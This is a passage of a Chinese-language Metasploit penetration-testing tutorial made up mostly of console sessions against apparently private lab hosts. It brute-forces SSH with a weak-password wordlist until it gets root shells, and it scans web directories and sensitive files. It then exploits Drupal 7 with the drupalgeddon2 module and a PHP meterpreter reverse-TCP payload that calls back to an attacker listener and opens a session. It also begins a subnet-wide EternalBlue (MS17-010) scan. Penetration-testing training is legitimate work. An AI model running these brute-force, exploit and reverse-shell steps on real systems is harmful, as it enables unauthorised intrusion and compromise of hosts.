   22  auxiliary/scanner/sap/sap_mgmt_con_version                                normal  No     SAP Management Console Version Detection
   23  auxiliary/scanner/scada/digi_addp_version                                 normal  No     Digi ADDP Information Discovery
   24  auxiliary/scanner/scada/digi_realport_version                             normal  No     Digi RealPort Serial Server Version
   25  auxiliary/scanner/smb/smb_version                                         normal  No     SMB Version Detection
   26  auxiliary/scanner/smtp/smtp_version                                       normal  No     SMTP Banner Grabber
   27  auxiliary/scanner/snmp/aix_version                                        normal  No     AIX SNMP Scanner Auxiliary Module
   28  auxiliary/scanner/ssh/ssh_version                                         normal  No     SSH Version Scanner
   29  auxiliary/scanner/telnet/lantronix_telnet_version                         normal  No     Lantronix Telnet Service Banner Detection
   30  auxiliary/scanner/telnet/telnet_version                                   normal  No     Telnet Service Banner Detection
   31  auxiliary/scanner/vmware/vmauthd_version                                  normal  No     VMWare Authentication Daemon Version Scanner
   32  auxiliary/scanner/vxworks/wdbrpc_version                                  normal  No     VxWorks WDB Agent Version Scanner

msf5 >

口令猜测

对于发现的系统与文件管理类网络服务,比如Telnet、SSH、 FTP 等,可以进行弱口令的猜测,以及对明文传输口令的嗅探,从而尝试获取直接通过这些服务进人目标网络的通道。

同样在 Metasploit 的辅助模块中,有很多用于服务口令猜解的工具,这些工具通常以

[service_name]_login

命名。

  • SSH 服务口令猜解

在确定了网络上的 SSH 服务之后,可以使用 MSF 中的ssh_login 模块对 SSH 服务进行口令猜测攻击,在进行口令攻击之前,需要一个好用的用户名和口令字典。

msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > show options 

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.33.6.150
rhosts => 192.33.6.150
msf5 auxiliary(scanner/ssh/ssh_login) > set UseR_FILE /home/qftm/Desktop/dic/user
UseR_FILE => /home/qftm/Desktop/dic/user
msf5 auxiliary(scanner/ssh/ssh_login) > set PaSS_FiLE /home/qftm/Desktop/dic/pass
PaSS_FiLE => /home/qftm/Desktop/dic/pass
msf5 auxiliary(scanner/ssh/ssh_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf5 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
VERBOSE => true
msf5 auxiliary(scanner/ssh/ssh_login) > show options 

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting              Required  Description
   ----              ---------------              --------  -----------
   BLANK_PASSWORDS   true                         no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                            yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                        no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                        no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                        no        Add all users in the current database to the list
   PASSWORD                                       no        A specific password to authenticate with
   PASS_FILE         /home/qftm/Desktop/dic/pass  no        File containing passwords, one per line
   RHOSTS            192.33.6.150                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             22                           yes       The target port
   STOP_ON_SUCCESS   false                        yes       Stop guessing when a credential works for a host
   THREADS           1                            yes       The number of concurrent threads (max one per host)
   USERNAME                                       no        A specific username to authenticate as
   USERPASS_FILE                                  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                        no        Try the username as the password for all users
   USER_FILE         /home/qftm/Desktop/dic/user  no        File containing usernames, one per line
   VERBOSE           true                         yes       Whether to print output for all attempts

msf5 auxiliary(scanner/ssh/ssh_login) >run
[-] 192.33.6.150:22 - Failed: 'root:'
[+] 192.33.6.150:22 - Success: 'root:root' 'uid=0(root) gid=0(root) groups=0(root) Linux Pentesting 5.4.0-kali3-amd64 #1 SMP Debian 5.4.13-1kali1 (2020-01-20) x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.33.6.150:45871 -> 192.33.6.150:22) at 2020-06-22 22:50:03 -0400
[-] 192.33.6.150:22 - Failed: 'r00t:'
[-] 192.33.6.150:22 - Failed: 'r00t:root'
[-] 192.33.6.150:22 - Failed: 'r00t:123456'
[-] 192.33.6.150:22 - Failed: 'r00t:woaini'
[-] 192.33.6.150:22 - Failed: 'r00t:qftm'
[-] 192.33.6.150:22 - Failed: 'r00t:hack'
[-] 192.33.6.150:22 - Failed: 'r00t:pass1'
[-] 192.33.6.150:22 - Failed: 'r00t:qweasd'
[-] 192.33.6.150:22 - Failed: 'r00t:iloveyou'
[-] 192.33.6.150:22 - Failed: 'r00t:admin'
[-] 192.33.6.150:22 - Failed: 'roots:'
[-] 192.33.6.150:22 - Failed: 'roots:root'
[-] 192.33.6.150:22 - Failed: 'roots:123456'
[-] 192.33.6.150:22 - Failed: 'roots:woaini'
[-] 192.33.6.150:22 - Failed: 'roots:qftm'
[-] 192.33.6.150:22 - Failed: 'roots:hack'
[-] 192.33.6.150:22 - Failed: 'roots:pass1'
[-] 192.33.6.150:22 - Failed: 'roots:qweasd'
[-] 192.33.6.150:22 - Failed: 'roots:iloveyou'
[-] 192.33.6.150:22 - Failed: 'roots:admin'
[-] 192.33.6.150:22 - Failed: 'qftm:'
[-] 192.33.6.150:22 - Failed: 'qftm:root'
[-] 192.33.6.150:22 - Failed: 'qftm:123456'
[-] 192.33.6.150:22 - Failed: 'qftm:woaini'
[+] 192.33.6.150:22 - Success: 'qftm:qftm' 'uid=0(root) gid=0(root) groups=0(root),24(cdrom),27(sudo),29(audio),44(video) Linux Pentesting 5.4.0-kali3-amd64 #1 SMP Debian 5.4.13-1kali1 (2020-01-20) x86_64 GNU/Linux '
[*] Command shell session 2 opened (192.33.6.150:37349 -> 192.33.6.150:22) at 2020-06-22 22:51:03 -0400
[-] 192.33.6.150:22 - Failed: 'admin:'
[-] 192.33.6.150:22 - Failed: 'admin:root'
[-] 192.33.6.150:22 - Failed: 'admin:123456'
[-] 192.33.6.150:22 - Failed: 'admin:woaini'
[-] 192.33.6.150:22 - Failed: 'admin:qftm'
[-] 192.33.6.150:22 - Failed: 'admin:hack'
[-] 192.33.6.150:22 - Failed: 'admin:pass1'
[-] 192.33.6.150:22 - Failed: 'admin:qweasd'
[-] 192.33.6.150:22 - Failed: 'admin:iloveyou'
[-] 192.33.6.150:22 - Failed: 'admin:admin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) >

从暴力破解日志结果看到,成功破解了主机192.33.6.150的SSH服务口令,并且MSF自动给我们连接了一个session会话

[+] 192.33.6.150:22 - Success: 'qftm:qftm' 'uid=0(root) gid=0(root) groups=0(root),24(cdrom),27(sudo),29(audio),44(video) Linux Pentesting 5.4.0-kali3-amd64 #1 SMP Debian 5.4.13-1kali1 (2020-01-20) x86_64 GNU/Linux '
[*] Command shell session 2 opened (192.33.6.150:37349 -> 192.33.6.150:22) at 2020-06-22 22:51:03 -0400

通过sessionID连接进入会话

msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 2
[*] Starting interaction with 2...

id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),27(sudo),29(audio),44(video)
whoami
root
exit

[*] 192.33.6.150 - Command shell session 2 closed.  Reason: User exit
msf5 auxiliary(scanner/ssh/ssh_login) >
  • 其他服务口令猜解

使用search进行特定搜索

msf5 > search type:auxiliary path:_login

Matching Modules
================

   #   Name                                                       Disclosure Date  Rank    Check  Description
   -   ----                                                       ---------------  ----    -----  -----------
   0   auxiliary/admin/mssql/mssql_enum_sql_logins                                 normal  No     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
   1   auxiliary/admin/oracle/oracle_login                        2008-11-20       normal  No     Oracle Account Discovery
   2   auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt                               normal  No     SMB NTLMv1 Login Request Corruption
   3   auxiliary/fuzzers/tds/tds_login_corrupt                                     normal  No     TDS Protocol Login Request Corruption Fuzzer
   4   auxiliary/fuzzers/tds/tds_login_username                                    normal  No     TDS Protocol Login Request Username Fuzzer
   5   auxiliary/scanner/afp/afp_login                                             normal  No     Apple Filing Protocol Login Utility
   6   auxiliary/scanner/couchdb/couchdb_login                                     normal  No     CouchDB Login Utility
   7   auxiliary/scanner/ftp/ftp_login                                             normal  No     FTP Authentication Scanner
   8   auxiliary/scanner/http/advantech_webaccess_login                            normal  No     Advantech WebAccess Login
   9   auxiliary/scanner/http/appletv_login                                        normal  No     AppleTV AirPlay Login Utility
   10  auxiliary/scanner/http/axis_login                                           normal  No     Apache Axis2 Brute Force Utility
   11  auxiliary/scanner/http/bavision_cam_login                                   normal  No     BAVision IP Camera Web Server Login
   12  auxiliary/scanner/http/binom3_login_config_pass_dump                        normal  No     Binom3 Web Management Login Scanner, Config and Password File Dump
   13  auxiliary/scanner/http/buffalo_login                                        normal  No     Buffalo NAS Login Utility
   14  auxiliary/scanner/http/buildmaster_login                                    normal  No     Inedo BuildMaster Login Scanner
   15  auxiliary/scanner/http/caidao_bruteforce_login                              normal  No     Chinese Caidao Backdoor Bruteforce
   16  auxiliary/scanner/http/chef_webui_login                                     normal  No     Chef Web UI Brute Force Utility
   17  auxiliary/scanner/http/cisco_firepower_login                                normal  No     Cisco Firepower Management Console 6.0 Login
   18  auxiliary/scanner/http/cnpilot_r_web_login_loot                             normal  No     Cambium cnPilot r200/r201 Login Scanner and Config Dump
   19  auxiliary/scanner/http/directadmin_login                                    normal  No     DirectAdmin Web Control Panel Login Utility
   20  auxiliary/scanner/http/dlink_dir_300_615_http_login                         normal  No     D-Link DIR-300A / DIR-320 / DIR-615D HTTP Login Utility
   21  auxiliary/scanner/http/dlink_dir_615h_http_login                            normal  No     D-Link DIR-615H HTTP Login Utility
   22  auxiliary/scanner/http/dlink_dir_session_cgi_http_login                     normal  No     D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility
   23  auxiliary/scanner/http/dolibarr_login                                       normal  No     Dolibarr ERP/CRM Login Utility
   24  auxiliary/scanner/http/epmp1000_web_login                                   normal  No     Cambium ePMP 1000 Login Scanner
   25  auxiliary/scanner/http/etherpad_duo_login                                   normal  No     EtherPAD Duo Login Bruteforce Utility
   26  auxiliary/scanner/http/frontpage_login                                      normal  No     FrontPage Server Extensions Anonymous Login Scanner
   27  auxiliary/scanner/http/gavazzi_em_login_loot                                normal  No     Carlo Gavazzi Energy Meters - Login Brute Force, Extract Info and Dump Plant Database
   28  auxiliary/scanner/http/gitlab_login                                         normal  No     GitLab Login Utility
   29  auxiliary/scanner/http/glassfish_login                                      normal  No     GlassFish Brute Force Utility
   30  auxiliary/scanner/http/hp_sys_mgmt_login                                    normal  No     HP System Management Homepage Login Utility
   31  auxiliary/scanner/http/http_login                                           normal  No     HTTP Login Utility
   32  auxiliary/scanner/http/ipboard_login                                        normal  No     IP Board Login Auxiliary Module
   33  auxiliary/scanner/http/jenkins_login                                        normal  No     Jenkins-CI Login Utility
   34  auxiliary/scanner/http/joomla_bruteforce_login                              normal  No     Joomla Bruteforce Login Utility
   35  auxiliary/scanner/http/manageengine_desktop_central_login                   normal  No     ManageEngine Desktop Central Login Utility
   36  auxiliary/scanner/http/mybook_live_login                                    normal  No     Western Digital MyBook Live Login Utility
   37  auxiliary/scanner/http/octopusdeploy_login                                  normal  No     Octopus Deploy Login Utility
   38  auxiliary/scanner/http/onion_omega2_login                  2019-03-27       normal  No     Onion Omega2 Login Brute-Force
   39  auxiliary/scanner/http/openmind_messageos_login                             normal  No     OpenMind Message-OS Portal Login Brute Force Utility
   40  auxiliary/scanner/http/oracle_ilom_login                                    normal  No     Oracle ILO Manager Login Brute Force Utility
   41  auxiliary/scanner/http/owa_ews_login                                        normal  No     OWA Exchange Web Services (EWS) Login Scanner
   42  auxiliary/scanner/http/owa_login                                            normal  No     Outlook Web App (OWA) Brute Force Utility
   43  auxiliary/scanner/http/phpmyadmin_login                                     normal  No     PhpMyAdmin Login Scanner
   44  auxiliary/scanner/http/pocketpad_login                                      normal  No     PocketPAD Login Bruteforce Force Utility
   45  auxiliary/scanner/http/splunk_web_login                                     normal  No     Splunk Web Interface Login Utility
   46  auxiliary/scanner/http/symantec_web_gateway_login                           normal  No     Symantec Web Gateway Login Utility
   47  auxiliary/scanner/http/tomcat_mgr_login                                     normal  No     Tomcat Application Manager Login Utility
   48  auxiliary/scanner/http/vcms_login                                           normal  No     V-CMS Login Utility
   49  auxiliary/scanner/http/wordpress_login_enum                                 normal  No     WordPress Brute Force and User Enumeration Utility
   50  auxiliary/scanner/http/wordpress_xmlrpc_login                               normal  No     WordPress XML-RPC Username/Password Login Scanner
   51  auxiliary/scanner/http/zabbix_login                                         normal  No     Zabbix Server Brute Force Utility
   52  auxiliary/scanner/lotus/lotus_domino_login                                  normal  No     Lotus Domino Brute Force Utility
   53  auxiliary/scanner/misc/cctv_dvr_login                                       normal  No     CCTV DVR Login Scanning Utility
   54  auxiliary/scanner/misc/ibm_mq_login                                         normal  No     IBM WebSphere MQ Login Check
   55  auxiliary/scanner/mongodb/mongodb_login                                     normal  No     MongoDB Login Utility
   56  auxiliary/scanner/msf/msf_rpc_login                                         normal  No     Metasploit RPC Interface Login Utility
   57  auxiliary/scanner/msf/msf_web_login                                         normal  No     Metasploit Web Interface Login Utility
   58  auxiliary/scanner/mssql/mssql_login                                         normal  No     MSSQL Login Utility
   59  auxiliary/scanner/mysql/mysql_login                                         normal  No     MySQL Login Utility
   60  auxiliary/scanner/nessus/nessus_ntp_login                                   normal  No     Nessus NTP Login Utility
   61  auxiliary/scanner/nessus/nessus_rest_login                                  normal  No     Nessus RPC Interface Login Utility
   62  auxiliary/scanner/nessus/nessus_xmlrpc_login                                normal  No     Nessus XMLRPC Interface Login Utility
   63  auxiliary/scanner/nexpose/nexpose_api_login                                 normal  No     NeXpose API Interface Login Utility
   64  auxiliary/scanner/nntp/nntp_login                                           normal  No     NNTP Login Utility
   65  auxiliary/scanner/openvas/openvas_gsad_login                                normal  No     OpenVAS gsad Web Interface Login Utility
   66  auxiliary/scanner/openvas/openvas_omp_login                                 normal  No     OpenVAS OMP Login Utility
   67  auxiliary/scanner/openvas/openvas_otp_login                                 normal  No     OpenVAS OTP Login Utility
   68  auxiliary/scanner/oracle/isqlplus_login                                     normal  No     Oracle iSQL*Plus Login Utility
   69  auxiliary/scanner/oracle/oracle_login                                       normal  No     Oracle RDBMS Login Utility
   70  auxiliary/scanner/pcanywhere/pcanywhere_login                               normal  No     PcAnywhere Login Scanner
   71  auxiliary/scanner/pop3/pop3_login                                           normal  No     POP3 Login Utility
   72  auxiliary/scanner/postgres/postgres_login                                   normal  No     PostgreSQL Login Utility
   73  auxiliary/scanner/redis/redis_login                                         normal  No     Redis Login Utility
   74  auxiliary/scanner/rservices/rexec_login                                     normal  No     rexec Authentication Scanner
   75  auxiliary/scanner/rservices/rlogin_login                                    normal  No     rlogin Authentication Scanner
   76  auxiliary/scanner/rservices/rsh_login                                       normal  No     rsh Authentication Scanner
   77  auxiliary/scanner/sap/sap_mgmt_con_brute_login                              normal  No     SAP Management Console Brute Force
   78  auxiliary/scanner/sap/sap_soap_rfc_brute_login                              normal  No     SAP SOAP Service RFC_PING Login Brute Forcer
   79  auxiliary/scanner/sap/sap_web_gui_brute_login                               normal  No     SAP Web GUI Login Brute Forcer
   80  auxiliary/scanner/scada/koyo_login                         2012-01-19       normal  No     Koyo DirectLogic PLC Password Brute Force Utility
   81  auxiliary/scanner/smb/smb_login                                             normal  No     SMB Login Check Scanner
   82  auxiliary/scanner/snmp/snmp_login                                           normal  No     SNMP Community Login Scanner
   83  auxiliary/scanner/ssh/karaf_login                                           normal  No     Apache Karaf Login Utility
   84  auxiliary/scanner/ssh/ssh_login                                             normal  No     SSH Login Check Scanner
   85  auxiliary/scanner/ssh/ssh_login_pubkey                                      normal  No     SSH Public Key Login Scanner
   86  auxiliary/scanner/telnet/brocade_enable_login                               normal  No     Brocade Enable Login Check Scanner
   87  auxiliary/scanner/telnet/telnet_login                                       normal  No     Telnet Login Check Scanner
   88  auxiliary/scanner/teradata/teradata_odbc_login             2018-03-30       normal  No     Teradata ODBC Login Scanner Module
   89  auxiliary/scanner/varnish/varnish_cli_login                                 normal  No     Varnish Cache CLI Login Utility
   90  auxiliary/scanner/vmware/vmauthd_login                                      normal  No     VMWare Authentication Daemon Login Scanner
   91  auxiliary/scanner/vmware/vmware_http_login                                  normal  No     VMWare Web Login Scanner
   92  auxiliary/scanner/vnc/vnc_login                                             normal  No     VNC Authentication Scanner
   93  auxiliary/scanner/winrm/winrm_login                                         normal  No     WinRM Login Utility
   94  auxiliary/voip/asterisk_login                                               normal  No     Asterisk Manager Login Utility

msf5 >

网站敏感目录扫描

可以借助 Metasploit 中的 brute_dirs、dir_listing、dir_scanner 等辅助模块来进行网站敏感目录扫描。

他们主要使用暴力猜解的方式工作,注意此处需要提供一个目录字典。

msf5 > use auxiliary/scanner/http/dir_scanner
msf5 auxiliary(scanner/http/dir_scanner) > show options 

Module options (auxiliary/scanner/http/dir_scanner):

   Name        Current Setting                                          Required  Description
   ----        ---------------                                          --------  -----------
   DICTIONARY  /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt  no        Path of word dictionary to use
   PATH        /                                                        yes       The path  to identify files
   Proxies                                                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80                                                       yes       The target port (TCP)
   SSL         false                                                    no        Negotiate SSL/TLS for outgoing connections
   THREADS     1                                                        yes       The number of concurrent threads (max one per host)
   VHOST                                                                no        HTTP server virtual host

msf5 auxiliary(scanner/http/dir_scanner) > set rhosts 192.33.6.147
rhosts => 192.33.6.147
msf5 auxiliary(scanner/http/dir_scanner) > set threads 50
threads => 50
msf5 auxiliary(scanner/http/dir_scanner) > show options 

Module options (auxiliary/scanner/http/dir_scanner):

   Name        Current Setting                                          Required  Description
   ----        ---------------                                          --------  -----------
   DICTIONARY  /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt  no        Path of word dictionary to use
   PATH        /                                                        yes       The path  to identify files
   Proxies                                                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      192.33.6.147                                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80                                                       yes       The target port (TCP)
   SSL         false                                                    no        Negotiate SSL/TLS for outgoing connections
   THREADS     50                                                       yes       The number of concurrent threads (max one per host)
   VHOST                                                                no        HTTP server virtual host

msf5 auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.33.6.147
[+] Found http://192.33.6.147:80/.../ 403 (192.33.6.147)
[+] Found http://192.33.6.147:80/.CVS/ 403 (192.33.6.147)
[+] Found http://192.33.6.147:80/0/ 200 (192.33.6.147)
[+] Found http://192.33.6.147:80/Admin/ 403 (192.33.6.147)
[+] Found http://192.33.6.147:80/USER/ 200 (192.33.6.147)
[+] Found http://192.33.6.147:80/admin/ 403 (192.33.6.147)
[+] Found http://192.33.6.147:80/batch/ 403 (192.33.6.147)
[+] Found http://192.33.6.147:80/cgi-bin/ 403 (192.33.6.147)
[+] Found http://192.33.6.147:80/icons/ 403 (192.33.6.147)
[+] Found http://192.33.6.147:80/includes/ 403 (192.33.6.147)
[+] Found http://192.33.6.147:80/misc/ 403 (192.33.6.147)
[+] Found http://192.33.6.147:80/modules/ 403 (192.33.6.147)
[+] Found http://192.33.6.147:80/node/ 200 (192.33.6.147)
[+] Found http://192.33.6.147:80/profiles/ 403 (192.33.6.147)
[+] Found http://192.33.6.147:80/scripts/ 403 (192.33.6.147)
[+] Found http://192.33.6.147:80/search/ 403 (192.33.6.147)
[+] Found http://192.33.6.147:80/sites/ 403 (192.33.6.147)
[+] Found http://192.33.6.147:80/themes/ 403 (192.33.6.147)
[+] Found http://192.33.6.147:80/user/ 200 (192.33.6.147)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/dir_scanner) >

网站敏感文件扫描

通过控制台执行系统命令,运行第三方下载的工具进行敏感文件的扫描

msf5 > python3 dirsearch.py -u http://192.33.6.147 -e *
[*] exec: python3 dirsearch.py -u http://192.33.6.147 -e *


 _|. _ _  _  _  _ _|_    v0.3.9                                                                                     
(_||| _) (/_(_|| (_| )                                                                                              

Extensions: CHANGELOG.md | HTTP method: get | Threads: 10 | Wordlist size: 6130

Error Log: /mnt/hgfs/QSec/Pentest/dirsearch/logs/errors-20-06-23_12-12-54.log

Target: http://192.33.6.147                                                                           
[12:12:54] Starting: 

[12:13:02] 200 -    7KB - /0 
[12:17:13] 301 -  315B  - /includes  ->  http://192.33.6.147/includes/ 
[12:17:18] 200 -    7KB - /index.php 
[12:17:20] 200 -   17KB - /INSTALL                 
[12:17:21] 403 -  291B  - /install.inc      
[12:17:21] 403 -  293B  - /INSTALL.mysql
[12:17:21] 403 -  293B  - /install.mysql
[12:17:21] 200 -    1KB - /INSTALL.mysql.txt
[12:17:22] 403 -  293B  - /INSTALL.pgsql
[12:17:22] 403 -  293B  - /install.pgsql
[12:17:22] 200 -    2KB - /INSTALL.pgsql.txt
[12:17:22] 403 -  291B  - /install.sql 
[12:17:22] 403 -  291B  - /install.tpl
[12:17:22] 200 -   17KB - /INSTALL.txt
[12:17:22] 200 -    3KB - /install.php
[12:17:37] 200 -   18KB - /LICENSE                                        
[12:17:37] 200 -   18KB - /LICENSE.txt
[12:18:23] 200 -    7KB - /node                                
[12:18:29] 403 -  290B  - /orders.sql                                          
[12:19:10] 301 -  315B  - /profiles  ->  http://192.33.6.147/profiles/                   
[12:19:10] 403 -  309B  - /profiles/minimal/minimal.info
[12:19:10] 403 -  311B  - /profiles/standard/standard.info
[12:19:10] 403 -  309B  - /profiles/testing/testing.info
[12:19:16] 200 -    5KB - /README                
[12:19:17] 200 -    5KB - /README.txt                      
[12:19:22] 403 -  292B  - /revision.inc         
[12:19:22] 200 -    2KB - /robots.txt        
[12:19:22] 403 -  284B  - /Root
[12:19:24] 403 -  289B  - /sales.sql                 
[12:19:25] 403 -  290B  - /schema.sql               
[12:19:26] 301 -  314B  - /scripts  ->  http://192.33.6.147/scripts/
[12:20:32] 200 -    9KB - /UPGRADE                                          
[12:20:33] 200 -    9KB - /UPGRADE.txt                            
[12:20:38] 200 -    7KB - /user                
[12:20:38] 200 -    7KB - /user/
[12:20:48] 200 -    2KB - /web.config
[12:21:03] 200 -   42B  - /xmlrpc.php
Task Completed                                       
msf5 >

网络服务渗透测试

Drupal组件渗透

Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。

  • 信息收集

前期的情报搜集得到主机192.33.6.147、开放80端口,尝试访问继续探索

使用wappalyzer探索其网站框架为Drupal、且版本为7Debian Apache 2.2.22 PHP 5.4.45

后续利用Metasploit进行渗透测试

  • 搜索相关模块
msf5 > search drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entiy Injection
   1  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Eumeration
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Vlue SQL Injection
   3  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote ommand Execution
   4  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 FormsAPI Property Injection
   5  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module RemotePHP Code Execution
   6  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Servicesunserialize() RCE
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code xecution


msf5 >
  • 模块配置
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

Name Current Setting Required Description

DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>‘
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host

Payload options (multi/meterpreter/reverse_https):

Name Current Setting Required Description

LHOST 192.33.6.150 yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path

Exploit target:

Id Name

0 Automatic (PHP In-Memory)

msf5 exploit(unix/webapp/drupal_drupalgeddon2) >
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.33.6.147
rhosts => 192.33.6.147
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show targets

Exploit targets:

Id Name

0 Automatic (PHP In-Memory)
1 Automatic (PHP Dropper)
2 Automatic (Unix In-Memory)
3 Automatic (Linux Dropper)
4 Drupal 7.x (PHP In-Memory)
5 Drupal 7.x (PHP Dropper)
6 Drupal 7.x (Unix In-Memory)
7 Drupal 7.x (Linux Dropper)
8 Drupal 8.x (PHP In-Memory)
9 Drupal 8.x (PHP Dropper)
10 Drupal 8.x (Unix In-Memory)
11 Drupal 8.x (Linux Dropper)

msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

Name Current Setting Required Description

DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOSTS 192.33.6.147 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>‘
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description

LHOST 192.33.6.150 yes The listen address (an interface may be specified)
LPORT 8443 yes The listen port

Exploit target:

Id Name

0 Automatic (PHP In-Memory)

msf5 exploit(unix/webapp/drupal_drupalgeddon2) >
  • 攻击获取会话
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[] Started reverse TCP handler on 192.33.6.150:8443
[] Sending stage (38288 bytes) to 192.33.6.147
[*] Meterpreter session 1 opened (192.33.6.150:8443 -> 192.33.6.147:57700) at 2020-06-23 22:59:04 -0400

meterpreter >
meterpreter > getuid
Server username: www-data (33)
meterpreter >

永恒之蓝

  • 信息收集

使用MSF辅助模块扫描内网中存在`“永恒之蓝”`的主机

搜索相关辅助模块

msf5 > search type:auxiliary path:ms17_010

Matching Modules
Name Disclosure Date Rank Check Description
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection

msf5 >

配置相关辅助模块进行探测

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description

CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>‘
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.33.6.0/24
rhosts => 192.33.6.0/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 50
threads => 50
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description

CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 192.33.6.0/24 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>‘
RPORT 445 yes The SMB service port (TCP)
